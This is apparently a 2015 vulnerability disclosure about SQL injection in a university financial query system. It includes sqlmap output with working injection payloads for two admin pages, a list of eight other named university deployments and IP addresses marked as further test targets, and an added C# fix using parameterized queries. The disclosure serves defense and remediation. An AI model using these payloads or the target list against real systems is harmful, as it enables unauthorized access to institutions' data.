2015-04-24: Details reported to the vendor; awaiting vendor handling
2015-04-28: Vendor confirmed the issue; details visible to the vendor only
2015-05-01: Details opened to third-party security partners
2015-06-22: Details opened to core white hats and relevant domain experts
2015-07-02: Details opened to regular white hats
2015-07-12: Details opened to intern white hats
2015-07-27: Details opened to the public
As stated in the title.
A financial information query system developed by Shanghai University of Finance and Economics Technology Development Co., Ltd. (上海财大科技发展有限公司). http://www.shcdkf.com/
Several places have broken access control and, at the same time, SQL injection. The access-control issues were already submitted by someone else; nobody seems to have paid attention to the injection.
#1
http://www.shcdkf.com/cwc/KFweb/admin/StudentPassword.aspx
The name search box in the upper left is injectable.
POST parameter 'txtXm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 135 HTTP(s) requests:
---
Place: POST
Parameter: txtXm
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=[base64 blob removed]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 blob removed]&txtXm=1'; WAITFOR DELAY '0:0:5'--&ddlDepart=&btFilter=%B9%FD%C2%CB&GridView1$ctl13$AspNetPager1_input=1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=[base64 blob removed]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 blob removed]&txtXm=1' WAITFOR DELAY '0:0:5'--&ddlDepart=&btFilter=%B9%FD%C2%CB&GridView1$ctl13$AspNetPager1_input=1
---
[19:37:02] [INFO] testing Microsoft SQL Server
[19:37:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:37:11] [INFO] confirming Microsoft SQL Server
[19:37:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:37:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[19:37:17] [INFO] fetched data logged to text files under 'C:\Users\sith\.sqlmap\output\www.shcdkf.com'
#2
http://www.shcdkf.com/KfWeb/admin/UserManager.aspx
The user search box in the upper left of the user management page is also injectable.
POST parameter 'txtXm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: POST
Parameter: txtXm
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=[base64 blob removed]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 blob removed]&txtXm=2006030001' AND 3130=3130 AND 'Ojzn'='Ojzn&btFilter=%B9%FD%C2%CB&GridView1$ctl18$AspNetPager1_input=1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: __VIEWSTATE=[base64 blob removed]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 blob removed]&txtXm=2006030001' AND 1435=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uasz'='Uasz&btFilter=%B9%FD%C2%CB&GridView1$ctl18$AspNetPager1_input=1
---
[19:44:16] [INFO] testing Microsoft SQL Server
[19:44:16] [INFO] confirming Microsoft SQL Server
[19:44:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
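Both findings (#1 and #2) come from the same txtXm search field being spliced into a query. The following is an added example, not the vendor's or the reporter's code: a hypothetical ASP.NET WebForms handler showing the concatenation pattern that produces sqlmap's stacked-query and boolean-blind results, beside a parameterized version. The class name follows StudentPassword.aspx; table and column names and the connection string are assumptions.

```csharp
// Added example (not the vendor's code): hypothetical txtXm filter handler.
// Table and column names are assumptions; the connection string is a placeholder.
using System;
using System.Data;
using System.Data.SqlClient;

public partial class StudentPassword : System.Web.UI.Page
{
    private const string ConnStr = "Server=DB_HOST;Database=DB_NAME;Integrated Security=true;";

    // Injectable: the name is spliced into the statement, so a value such as
    // 1'; WAITFOR DELAY '0:0:5'-- closes the literal and runs a second statement,
    // which is the stacked-query / time-based result sqlmap reported.
    private DataTable FilterUnsafe(string name)
    {
        string sql = "SELECT Xh, Xm, Bm FROM Students WHERE Xm LIKE '%" + name + "%'";
        using (var conn = new SqlConnection(ConnStr))
        using (var da = new SqlDataAdapter(sql, conn))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Fixed: the name is bound as a typed parameter, so quotes, semicolons and
    // AND clauses inside it stay data. LIKE metacharacters are escaped too, so
    // a user cannot widen the match with % or _.
    private DataTable FilterSafe(string name)
    {
        const string sql = "SELECT Xh, Xm, Bm FROM Students WHERE Xm LIKE @xm ESCAPE '\\'";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@xm", SqlDbType.NVarChar, 50).Value = "%" + EscapeLike(name) + "%";
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Escape the LIKE pattern characters so they match literally under ESCAPE '\'.
    private static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");
    }
}
```

The same change applies to the user search on UserManager.aspx; binding the value as a parameter removes the boolean and heavy-query vectors as well, because the injected AND clauses never reach the parser as SQL.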
Other test cases:
http://gzcx.tynu.edu.cn/cwc/KFweb/admin/UserManager.aspx
http://cycwc.gzife.edu.cn/kefa/admin/UserManager.aspx
http://59.72.128.44/KfWeb/admin/UserManager.aspx
http://www.cqvie.com/xfcxsq/admin/UserManager.aspx
http://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspx
http://gzcx.tynu.edu.cn/KfWeb/admin/UserManager.aspx
http://cwc.sxufe.edu.cn/KfWeb/admin/UserManager.aspx
http://221.5.51.228/cjb/admin/UserManager.aspx
Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-04-28 09:26
CNVD confirmed and reproduced the described situation, and has notified the website's administering organization (the software vendor) through the website's public contact information (or a previously established handling channel).
Vendor response: none yet